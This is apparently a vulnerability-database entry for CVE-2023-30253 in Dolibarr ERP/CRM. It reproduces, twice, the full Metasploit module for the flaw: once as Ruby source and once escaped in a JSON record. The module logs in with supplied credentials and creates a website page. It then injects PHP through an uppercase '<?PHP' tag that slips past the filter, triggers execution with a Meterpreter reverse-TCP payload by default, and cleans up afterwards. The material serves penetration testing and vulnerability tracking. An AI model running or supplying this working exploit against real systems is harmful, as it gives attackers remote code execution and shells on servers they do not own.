Dolibarr ERP/CRM Authenticated Code Injection_MSF:EXPLOIT-UNIX-HTTP-DOLIBARR_CMS_RCE_CVE_2023_30253-

8.8 / 10

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Description

Dolibarr ERP/CRM before 17.0.1 allows remote code execution by an authenticated user who has access to the Website module. The application filters lowercase use exploit/unix/http/dolibarrcmsrcecve202330253 msf exploitdolibarrcmsrcecve202330253 show...

Visit Original Source

Basic Information

ID MSF:EXPLOIT-UNIX-HTTP-DOLIBARR_CMS_RCE_CVE_2023_30253-

Published May 14, 2026 at 19:00

Affected Product

Affected Versions ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Dolibarr ERP/CRM Authenticated Code Injection',
'Description' => %q{
Dolibarr ERP/CRM before 17.0.1 allows remote code execution by an
authenticated user who has access to the Website module. The
application filters lowercase `<?php` tags to prevent PHP code
injection in website page content, but this check can be bypassed
by using an uppercase variant such as `<?PHP`. This
allows injecting arbitrary PHP code that is executed when the
website page is rendered. Versions prior to 17.0.1 are known to
be vulnerable. The vulnerability was fixed in version 17.0.1.
},
'License' => MSF_LICENSE,
'Author' => [
'Tinexta Cyber Offensive Security Team', # Discovery
'Emanuele Cervelli' # Metasploit module
],
'References' => [
['CVE', '2023-30253'],
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-30253'],
['URL', 'https://www.swascan.com/security-advisory-dolibarr-17-0-0/']
],
'Platform' => ['php'],
'Arch' => [ARCH_PHP],
'Privileged' => false,
'Targets' => [
[
'PHP Meterpreter',
{
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Type' => :php,
'DefaultOptions' => {
'PAYLOAD' => 'php/meterpreter/reverse_tcp',
'Encoder' => 'php/base64'
}
}
]
],
'DisclosureDate' => '2023-05-29',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)

register_options(
[
Opt::RPORT(80),
OptString.new('USERNAME', [true, 'Dolibarr username', 'admin']),
OptString.new('PASSWORD', [true, 'Dolibarr password', 'admin']),
OptString.new('TARGETURI', [true, 'Base path to Dolibarr', '/'])
]
)
end

def referer(path)
proto = datastore['SSL'] ? 'https' : 'http'
"#{proto}://#{datastore['RHOSTS']}:#{datastore['RPORT']}#{normalize_uri(target_uri.path, path)}"
end

def get_csrf_token(path, referer: nil)
headers = {}
headers['Referer'] = referer if referer

res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, path),
'method' => 'GET',
'keep_cookies' => true,
'headers' => headers
)

return nil if res.nil?

html = res.get_html_document
token_meta = html.at('meta[@name="anti-csrf-newtoken"]')
return token_meta['content'] if token_meta

token_input = html.at('input[@name="token"]')
return token_input['value'] if token_input

nil
end

def login
token = get_csrf_token('index.php')
fail_with(Failure::UnexpectedReply, 'Could not retrieve CSRF token from login page') if token.nil?

vprint_status("Attempting login as #{datastore['USERNAME']}")
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'POST',
'keep_cookies' => true,
'headers' => {
'Referer' => referer('index.php')
},
'vars_post' => {
'token' => token,
'actionlogin' => 'login',
'loginfunction' => 'loginfunction',
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}
)

fail_with(Failure::Unreachable, 'No response received during login') if res.nil?
fail_with(Failure::NoAccess, 'Login failed - invalid credentials') if res.body.include?('Bad value for login or password')

print_good('Successfully authenticated to Dolibarr')
end

def check
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'GET'
)

return CheckCode::Unknown('Could not connect to web service - no response') if res.nil?
return CheckCode::Unknown("Unexpected HTTP response code: #{res.code}") unless res.code == 200
return CheckCode::Safe('Target does not appear to be running Dolibarr') unless res.body.downcase.include?('dolibarr')

version = nil
if res.body =~ /Dolibarr\s+(\d+\.\d+\.\d+)/i
version = ::Regexp.last_match(1)
end

if version
ver = Rex::Version.new(version)
if ver < Rex::Version.new('17.0.1')
return CheckCode::Appears("Vulnerable version detected: #{version}")
else
return CheckCode::Safe("Not vulnerable, version detected: #{version}")
end
end

CheckCode::Detected('Dolibarr detected but version could not be determined')
end

def create_website
@website_name = Rex::Text.rand_text_alpha_lower(8)
vprint_status("Creating website: #{@website_name}")
token = get_csrf_token('website/index.php', referer: referer('website/index.php'))

fail_with(Failure::UnexpectedReply, 'Could not get CSRF token for website creation') if token.nil?

res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'website', 'index.php'),
'method' => 'POST',
'keep_cookies' => true,
'headers' => { 'Referer' => referer('website/index.php') },
'vars_post' => {
'token' => token,
'action' => 'addsite',
'website' => '-1',
'WEBSITE_REF' => @website_name,
'WEBSITE_LANG' => 'en',
'addcontainer' => 'Create'
}
)

fail_with(Failure::Unreachable, 'No response when creating website') if res.nil?
fail_with(Failure::NotVulnerable, 'Website module is not enabled') if res.body.include?('Access denied')

print_good("Website '#{@website_name}' created")
@website_created = true
end

def create_page
@page_name = Rex::Text.rand_text_alpha_lower(6)
vprint_status("Creating page: #{@page_name}")
token = get_csrf_token('website/index.php', referer: referer('website/index.php'))
fail_with(Failure::UnexpectedReply, 'Could not get CSRF token for page creation') if token.nil?

res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'website', 'index.php'),
'method' => 'POST',
'keep_cookies' => true,
'headers' => { 'Referer' => referer('website/index.php') },
'vars_post' => {
'token' => token,
'action' => 'addcontainer',
'website' => @website_name,
'radiocreatefrom' => 'checkboxcreatemanually',
'WEBSITE_TYPE_CONTAINER' => 'page',
'sample' => 'empty',
'WEBSITE_TITLE' => @page_name,
'WEBSITE_PAGENAME' => @page_name,
'WEBSITE_LANG' => 'en',
'addcontainer' => 'Create'
}
)

fail_with(Failure::Unreachable, 'No response when creating page') if res.nil?
fail_with(Failure::UnexpectedReply, "Unexpected response code: #{res.code}") unless res.code == 200

html = res.get_html_document
page_option = html.at('select[@name="pageid"] option[selected]')
fail_with(Failure::UnexpectedReply, 'Could not find page ID') if page_option.nil?

@page_id = page_option['value']
fail_with(Failure::UnexpectedReply, 'Could not find page ID') if @page_id.to_s.empty?

print_good("Page '#{@page_name}' created with ID #{@page_id}")
end

def inject_and_trigger
token = get_csrf_token('website/index.php', referer: referer('website/index.php'))
fail_with(Failure::UnexpectedReply, 'Could not get CSRF token') if token.nil?

section_id = Rex::Text.rand_text_alpha_lower(8)
page_content = %(<section id="#{section_id}" contenteditable="true"><?PHP #{payload.encoded}; ?></section>)

res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'website', 'index.php'),
'method' => 'POST',
'keep_cookies' => true,
'headers' => { 'Referer' => referer('website/index.php') },
'vars_post' => {
'token' => token,
'backtopage' => '',
'dol_openinpopup' => '',
'action' => 'updatesource',
'website' => @website_name,
'pageid' => @page_id,
'update' => 'Save',
'PAGE_CONTENT' => page_content
}
)

fail_with(Failure::Unreachable, 'No response when injecting payload') if res.nil?

print_good('Payload injected, triggering...')

send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'public', 'website', 'index.php'),
'method' => 'GET',
'vars_get' => {
'website' => @website_name,
'pageref' => @page_name
}
}, 5)
end

def get_website_id
token = get_csrf_token('website/index.php', referer: referer('website/index.php'))
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'website', 'index.php'),
'method' => 'GET',
'keep_cookies' => true,
'headers' => { 'Referer' => referer('website/index.php') },
'vars_get' => {
'action' => 'deletesite',
'token' => token,
'website' => @website_name
}
)

return nil if res.nil?

match = res.body.match(%r{/website/index\.php\?id=(\d+)&action=confirm_deletesite})
return match[1] if match

nil
end

def delete_page
token = get_csrf_token('website/index.php', referer: referer('website/index.php'))
send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'website', 'index.php'),
'method' => 'POST',
'keep_cookies' => true,
'headers' => { 'Referer' => referer('website/index.php') },
'vars_post' => {
'token' => token,
'backtopage' => '',
'website' => @website_name,
'pageid' => @page_id,
'delete' => 'Delete'
}
)
end

def delete_website
website_id = get_website_id
return if website_id.nil?

token = get_csrf_token('website/index.php', referer: referer('website/index.php'))
send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'website', 'index.php'),
'method' => 'GET',
'keep_cookies' => true,
'headers' => { 'Referer' => referer('website/index.php') },
'vars_get' => {
'id' => website_id,
'action' => 'confirm_deletesite',
'confirm' => 'yes',
'token' => token,
'delete_also_js' => '',
'delete_also_medias' => ''
}
)
end

def cleanup
super

return unless @website_created

begin
vprint_status("Cleaning up website '#{@website_name}'")
delete_page if @page_id
delete_website
print_good("Website '#{@website_name}' deleted")
rescue ::Rex::ConnectionError, ::Rex::ConnectionTimeout => e
print_warning("Cleanup failed: #{e.message}")
end
end

def exploit
login
create_website
create_page

print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")

inject_and_trigger
end
end

{
    "lastseen": "2026-05-14T19:28:01",
    "description": "Dolibarr ERP/CRM before 17.0.1 allows remote code execution by an authenticated user who has access to the Website module. The application filters lowercase use exploit/unix/http/dolibarrcmsrcecve202330253 msf exploitdolibarrcmsrcecve202330253 show...",
    "published": "2026-05-14T19:00:13",
    "modified": "2026-05-14T19:00:13",
    "type": "metasploit",
    "title": "Dolibarr ERP/CRM Authenticated Code Injection",
    "source": "",
    "references": "",
    "id": "MSF:EXPLOIT-UNIX-HTTP-DOLIBARR_CMS_RCE_CVE_2023_30253-",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2023-30253"
    ],
    "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n  Rank = ExcellentRanking\n\n  include Msf::Exploit::Remote::HttpClient\n  prepend Msf::Exploit::Remote::AutoCheck\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        'Name' => 'Dolibarr ERP/CRM Authenticated Code Injection',\n        'Description' => %q{\n          Dolibarr ERP/CRM before 17.0.1 allows remote code execution by an\n          authenticated user who has access to the Website module. The\n          application filters lowercase `<?php` tags to prevent PHP code\n          injection in website page content, but this check can be bypassed\n          by using an uppercase variant such as `<?PHP`. This\n          allows injecting arbitrary PHP code that is executed when the\n          website page is rendered. Versions prior to 17.0.1 are known to\n          be vulnerable. The vulnerability was fixed in version 17.0.1.\n        },\n        'License' => MSF_LICENSE,\n        'Author' => [\n          'Tinexta Cyber Offensive Security Team', # Discovery\n          'Emanuele Cervelli'                      # Metasploit module\n        ],\n        'References' => [\n          ['CVE', '2023-30253'],\n          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-30253'],\n          ['URL', 'https://www.swascan.com/security-advisory-dolibarr-17-0-0/']\n        ],\n        'Platform' => ['php'],\n        'Arch' => [ARCH_PHP],\n        'Privileged' => false,\n        'Targets' => [\n          [\n            'PHP Meterpreter',\n            {\n              'Platform' => 'php',\n              'Arch' => ARCH_PHP,\n              'Type' => :php,\n              'DefaultOptions' => {\n                'PAYLOAD' => 'php/meterpreter/reverse_tcp',\n                'Encoder' => 'php/base64'\n              }\n            }\n          ]\n        ],\n        'DisclosureDate' => '2023-05-29',\n        'DefaultTarget' => 0,\n        'Notes' => {\n          'Stability' => [CRASH_SAFE],\n          'Reliability' => [REPEATABLE_SESSION],\n          'SideEffects' => [IOC_IN_LOGS]\n        }\n      )\n    )\n\n    register_options(\n      [\n        Opt::RPORT(80),\n        OptString.new('USERNAME', [true, 'Dolibarr username', 'admin']),\n        OptString.new('PASSWORD', [true, 'Dolibarr password', 'admin']),\n        OptString.new('TARGETURI', [true, 'Base path to Dolibarr', '/'])\n      ]\n    )\n  end\n\n  def referer(path)\n    proto = datastore['SSL'] ? 'https' : 'http'\n    \"#{proto}://#{datastore['RHOSTS']}:#{datastore['RPORT']}#{normalize_uri(target_uri.path, path)}\"\n  end\n\n  def get_csrf_token(path, referer: nil)\n    headers = {}\n    headers['Referer'] = referer if referer\n\n    res = send_request_cgi(\n      'uri' => normalize_uri(target_uri.path, path),\n      'method' => 'GET',\n      'keep_cookies' => true,\n      'headers' => headers\n    )\n\n    return nil if res.nil?\n\n    html = res.get_html_document\n    token_meta = html.at('meta[@name=\"anti-csrf-newtoken\"]')\n    return token_meta['content'] if token_meta\n\n    token_input = html.at('input[@name=\"token\"]')\n    return token_input['value'] if token_input\n\n    nil\n  end\n\n  def login\n    token = get_csrf_token('index.php')\n    fail_with(Failure::UnexpectedReply, 'Could not retrieve CSRF token from login page') if token.nil?\n\n    vprint_status(\"Attempting login as #{datastore['USERNAME']}\")\n    res = send_request_cgi(\n      'uri' => normalize_uri(target_uri.path, 'index.php'),\n      'method' => 'POST',\n      'keep_cookies' => true,\n      'headers' => {\n        'Referer' => referer('index.php')\n      },\n      'vars_post' => {\n        'token' => token,\n        'actionlogin' => 'login',\n        'loginfunction' => 'loginfunction',\n        'username' => datastore['USERNAME'],\n        'password' => datastore['PASSWORD']\n      }\n    )\n\n    fail_with(Failure::Unreachable, 'No response received during login') if res.nil?\n    fail_with(Failure::NoAccess, 'Login failed - invalid credentials') if res.body.include?('Bad value for login or password')\n\n    print_good('Successfully authenticated to Dolibarr')\n  end\n\n  def check\n    res = send_request_cgi(\n      'uri' => normalize_uri(target_uri.path, 'index.php'),\n      'method' => 'GET'\n    )\n\n    return CheckCode::Unknown('Could not connect to web service - no response') if res.nil?\n    return CheckCode::Unknown(\"Unexpected HTTP response code: #{res.code}\") unless res.code == 200\n    return CheckCode::Safe('Target does not appear to be running Dolibarr') unless res.body.downcase.include?('dolibarr')\n\n    version = nil\n    if res.body =~ /Dolibarr\\s+(\\d+\\.\\d+\\.\\d+)/i\n      version = ::Regexp.last_match(1)\n    end\n\n    if version\n      ver = Rex::Version.new(version)\n      if ver < Rex::Version.new('17.0.1')\n        return CheckCode::Appears(\"Vulnerable version detected: #{version}\")\n      else\n        return CheckCode::Safe(\"Not vulnerable, version detected: #{version}\")\n      end\n    end\n\n    CheckCode::Detected('Dolibarr detected but version could not be determined')\n  end\n\n  def create_website\n    @website_name = Rex::Text.rand_text_alpha_lower(8)\n    vprint_status(\"Creating website: #{@website_name}\")\n    token = get_csrf_token('website/index.php', referer: referer('website/index.php'))\n\n    fail_with(Failure::UnexpectedReply, 'Could not get CSRF token for website creation') if token.nil?\n\n    res = send_request_cgi(\n      'uri' => normalize_uri(target_uri.path, 'website', 'index.php'),\n      'method' => 'POST',\n      'keep_cookies' => true,\n      'headers' => { 'Referer' => referer('website/index.php') },\n      'vars_post' => {\n        'token' => token,\n        'action' => 'addsite',\n        'website' => '-1',\n        'WEBSITE_REF' => @website_name,\n        'WEBSITE_LANG' => 'en',\n        'addcontainer' => 'Create'\n      }\n    )\n\n    fail_with(Failure::Unreachable, 'No response when creating website') if res.nil?\n    fail_with(Failure::NotVulnerable, 'Website module is not enabled') if res.body.include?('Access denied')\n\n    print_good(\"Website '#{@website_name}' created\")\n    @website_created = true\n  end\n\n  def create_page\n    @page_name = Rex::Text.rand_text_alpha_lower(6)\n    vprint_status(\"Creating page: #{@page_name}\")\n    token = get_csrf_token('website/index.php', referer: referer('website/index.php'))\n    fail_with(Failure::UnexpectedReply, 'Could not get CSRF token for page creation') if token.nil?\n\n    res = send_request_cgi(\n      'uri' => normalize_uri(target_uri.path, 'website', 'index.php'),\n      'method' => 'POST',\n      'keep_cookies' => true,\n      'headers' => { 'Referer' => referer('website/index.php') },\n      'vars_post' => {\n        'token' => token,\n        'action' => 'addcontainer',\n        'website' => @website_name,\n        'radiocreatefrom' => 'checkboxcreatemanually',\n        'WEBSITE_TYPE_CONTAINER' => 'page',\n        'sample' => 'empty',\n        'WEBSITE_TITLE' => @page_name,\n        'WEBSITE_PAGENAME' => @page_name,\n        'WEBSITE_LANG' => 'en',\n        'addcontainer' => 'Create'\n      }\n    )\n\n    fail_with(Failure::Unreachable, 'No response when creating page') if res.nil?\n    fail_with(Failure::UnexpectedReply, \"Unexpected response code: #{res.code}\") unless res.code == 200\n\n    html = res.get_html_document\n    page_option = html.at('select[@name=\"pageid\"] option[selected]')\n    fail_with(Failure::UnexpectedReply, 'Could not find page ID') if page_option.nil?\n\n    @page_id = page_option['value']\n    fail_with(Failure::UnexpectedReply, 'Could not find page ID') if @page_id.to_s.empty?\n\n    print_good(\"Page '#{@page_name}' created with ID #{@page_id}\")\n  end\n\n  def inject_and_trigger\n    token = get_csrf_token('website/index.php', referer: referer('website/index.php'))\n    fail_with(Failure::UnexpectedReply, 'Could not get CSRF token') if token.nil?\n\n    section_id = Rex::Text.rand_text_alpha_lower(8)\n    page_content = %(<section id=\"#{section_id}\" contenteditable=\"true\"><?PHP #{payload.encoded}; ?></section>)\n\n    res = send_request_cgi(\n      'uri' => normalize_uri(target_uri.path, 'website', 'index.php'),\n      'method' => 'POST',\n      'keep_cookies' => true,\n      'headers' => { 'Referer' => referer('website/index.php') },\n      'vars_post' => {\n        'token' => token,\n        'backtopage' => '',\n        'dol_openinpopup' => '',\n        'action' => 'updatesource',\n        'website' => @website_name,\n        'pageid' => @page_id,\n        'update' => 'Save',\n        'PAGE_CONTENT' => page_content\n      }\n    )\n\n    fail_with(Failure::Unreachable, 'No response when injecting payload') if res.nil?\n\n    print_good('Payload injected, triggering...')\n\n    send_request_cgi({\n      'uri' => normalize_uri(target_uri.path, 'public', 'website', 'index.php'),\n      'method' => 'GET',\n      'vars_get' => {\n        'website' => @website_name,\n        'pageref' => @page_name\n      }\n    }, 5)\n  end\n\n  def get_website_id\n    token = get_csrf_token('website/index.php', referer: referer('website/index.php'))\n    res = send_request_cgi(\n      'uri' => normalize_uri(target_uri.path, 'website', 'index.php'),\n      'method' => 'GET',\n      'keep_cookies' => true,\n      'headers' => { 'Referer' => referer('website/index.php') },\n      'vars_get' => {\n        'action' => 'deletesite',\n        'token' => token,\n        'website' => @website_name\n      }\n    )\n\n    return nil if res.nil?\n\n    match = res.body.match(%r{/website/index\\.php\\?id=(\\d+)&action=confirm_deletesite})\n    return match[1] if match\n\n    nil\n  end\n\n  def delete_page\n    token = get_csrf_token('website/index.php', referer: referer('website/index.php'))\n    send_request_cgi(\n      'uri' => normalize_uri(target_uri.path, 'website', 'index.php'),\n      'method' => 'POST',\n      'keep_cookies' => true,\n      'headers' => { 'Referer' => referer('website/index.php') },\n      'vars_post' => {\n        'token' => token,\n        'backtopage' => '',\n        'website' => @website_name,\n        'pageid' => @page_id,\n        'delete' => 'Delete'\n      }\n    )\n  end\n\n  def delete_website\n    website_id = get_website_id\n    return if website_id.nil?\n\n    token = get_csrf_token('website/index.php', referer: referer('website/index.php'))\n    send_request_cgi(\n      'uri' => normalize_uri(target_uri.path, 'website', 'index.php'),\n      'method' => 'GET',\n      'keep_cookies' => true,\n      'headers' => { 'Referer' => referer('website/index.php') },\n      'vars_get' => {\n        'id' => website_id,\n        'action' => 'confirm_deletesite',\n        'confirm' => 'yes',\n        'token' => token,\n        'delete_also_js' => '',\n        'delete_also_medias' => ''\n      }\n    )\n  end\n\n  def cleanup\n    super\n\n    return unless @website_created\n\n    begin\n      vprint_status(\"Cleaning up website '#{@website_name}'\")\n      delete_page if @page_id\n      delete_website\n      print_good(\"Website '#{@website_name}' deleted\")\n    rescue ::Rex::ConnectionError, ::Rex::ConnectionTimeout => e\n      print_warning(\"Cleanup failed: #{e.message}\")\n    end\n  end\n\n  def exploit\n    login\n    create_website\n    create_page\n\n    print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n    inject_and_trigger\n  end\nend\n",
    "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/http/dolibarr_cms_rce_cve_2023_30253.rb",
    "cvss": {
        "score": 8.8,
        "severity": "HIGH",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.rapid7.com/db/modules/exploit/unix/http/dolibarr_cms_rce_cve_2023_30253/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply